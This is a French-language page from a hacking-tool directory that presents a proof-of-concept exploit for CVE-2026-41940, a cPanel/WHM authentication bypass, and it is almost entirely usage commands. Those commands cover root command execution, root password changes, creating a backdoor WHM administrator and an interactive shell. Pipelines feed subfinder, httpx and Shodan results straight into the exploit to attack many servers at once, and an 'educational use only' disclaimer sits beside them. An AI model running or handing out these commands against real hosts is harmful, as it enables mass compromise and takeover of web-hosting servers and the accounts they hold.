Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2026-41940-PoC — Exploite CVE-2026-41940, un contournement d'authentification cPanel/WHM, pour obtenir un accès root à WHM et exécuter des commandes de post-exploitation, lister les comptes et lancer des sessions shell interactives. | Kitploit
Outils/GitHubGitHub/ctdal/cve-2026-41940-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebPost-ExploitationSécurité WebTests d'IntrusionCommandement et ContrôleAuthentificationRed TeamingOutil d'Accès à Distance
GitHubctdal/cve-2026-41940-poc
4411il y a 12h 7mPas encore vérifié

cve-2026-41940-PoC

Exploite CVE-2026-41940, un contournement d'authentification cPanel/WHM, pour obtenir un accès root à WHM et exécuter des commandes de post-exploitation, lister les comptes et lancer des sessions shell interactives.

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-41940

⚠ Cet outil est créé uniquement à des fins éducatives ou de bug bounty. Toute utilisation non autorisée en dehors d'environnements contrôlés est strictement interdite.

Description

Un outil pour exploiter CVE-2026-41940, un contournement d'authentification critique dans cPanel & WHM (CVSS 10.0), permettant à des attaquants non authentifiés d'obtenir un accès WHM au niveau root en injectant des séquences CRLF dans les fichiers de session côté serveur via l'en-tête Authorization — aucun identifiant requis.

Comment ça fonctionne

CVE-2026-41940, en termes généraux, est exploité via une défaillance dans la façon dont le système gère les sessions d'authentification dans cPanel/WHM. L'attaque commence généralement par une requête normale vers l'interface de connexion, où l'application initialise prématurément une session avant de valider complètement les identifiants de l'utilisateur. En raison d'une mauvaise gestion des entrées liées à la session, certaines structures d'entrée forgées ou inattendues peuvent altérer la façon dont les données de session sont stockées ou interprétées par le serveur.

Versions affectées

VersionVulnérableCorrigée
110.x≤ 11.110.0.9611.110.0.97
118.x≤ 11.118.0.6211.118.0.63
126.x≤ 11.126.0.5311.126.0.54
132.x≤ 11.132.0.2811.132.0.29
134.x≤ 11.134.0.1911.134.0.20
136.x≤ 11.136.0.411.136.0.5

Installation (Windows/Mac OS)🔄

root@kitploit:~
git clone https://github.com/ctdal/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
# Windows 
python cve.py
# MacOS/Linux
python3 cve.py

Comment l'utiliser

L'outil attend qu'un domaine cible soit spécifié.

Mode cible unique :

root@kitploit:~
python cve.py -u https://target1.com:2083

Vous pouvez également scanner depuis le fichier target.txt (à créer) :

root@kitploit:~
python cve.py -l target.txt -t 50 -o result.json

Scan basique :

Commandes disponibles :

root@kitploit:~
python cve.py -u https://victim1.com:2083 # scan d'une cible unique
python cve.py info -u https://victim1.com:2083 # Récupère les informations système (version, charge, utilisation du disque).
python cve.py host -u https://victim1.com:2083 # Récupère le nom d'hôte du serveur cible.

Actions post-exploitation

root@kitploit:~
# Lister tous les comptes sur le serveur
python cve.py list -u https://target.com:2087

# Commande OS
python cve.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python cve.py cmd -u https://target.com:2087 --cmd "ls /home"

# Obtenir les infos du serveur (hostname, disque, hôte MySQL)
python cve.py info -u https://target.com:2087

# Changer le mot de passe root
python cve.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Shell WHM interactif
python cve.py shell -u https://target.com:2087

Pipelines

root@kitploit:~
# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python cve.py scan -t 40 -o results.json

# Depuis une liste de périmètre
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python cve.py scan -t 30 -o results.json

# Résultats Shodan
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python cve.py -t 30 -o shodan_results.json

# Sources multiples combinées
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python cve.py -t 20 --action list

Mode Shell WHM

Après une exécution réussie, vous pouvez ouvrir un shell WHM interactif :

root@kitploit:~
python cve.py shell -u

Toutes les commandes du shell

CommandeDescription
idAfficher l'ID utilisateur
hostnameObtenir le nom d'hôte du serveur
accountsLister tous les comptes utilisateurs
infoCharge, disque, hôte MySQL, version
cat <path>Lire le contenu d'un fichier
exec <cmd>Exécuter une commande OS
newadmin <user> <pass>Créer un admin WHM backdoor
passwd <pass>Changer le mot de passe root
l [path]Lister un répertoire
helpAfficher toutes les commandes
exitQuitter le mode shell

Référence CLI

root@kitploit:~
usage: cve.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT] 

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

Avertissement

⚠ Cet outil est créé uniquement à des fins éducatives ou de bug bounty. Toute utilisation non autorisée en dehors d'environnements contrôlés est strictement interdite.

Télécharger l’outil